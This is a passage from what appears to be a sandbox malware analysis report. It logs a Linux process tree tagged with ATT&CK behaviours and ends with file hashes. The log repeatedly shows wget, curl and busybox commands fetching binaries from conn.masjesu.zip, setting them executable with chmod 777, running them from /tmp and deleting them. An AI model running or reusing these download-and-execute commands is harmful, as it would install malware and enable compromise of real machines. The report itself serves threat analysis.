- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr2⤵PID:932
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:933
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- System Network Configuration Discovery
PID:936
-
-
/bin/chmodchmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya2⤵PID:939
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:940
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:943
-
-
/bin/chmodchmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd82⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- System Network Configuration Discovery
PID:950
-
-
/bin/chmodchmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s2⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:957
-
-
/bin/chmodchmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:959
-
-
/bin/rmrm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA12⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:971
-
-
/bin/chmodchmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z2⤵PID:981
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- System Network Configuration Discovery
PID:985
-
-
/bin/chmodchmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- File and Directory Permissions Modification
PID:986
-
-
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵
- Executes dropped EXE
PID:987
-
-
/bin/rmrm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF2⤵PID:988
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:989
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:990
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- System Network Configuration Discovery
PID:992
-
-
/bin/chmodchmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- File and Directory Permissions Modification
PID:993
-
-
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵
- Executes dropped EXE
PID:994
-
-
/bin/rmrm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j2⤵PID:995
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97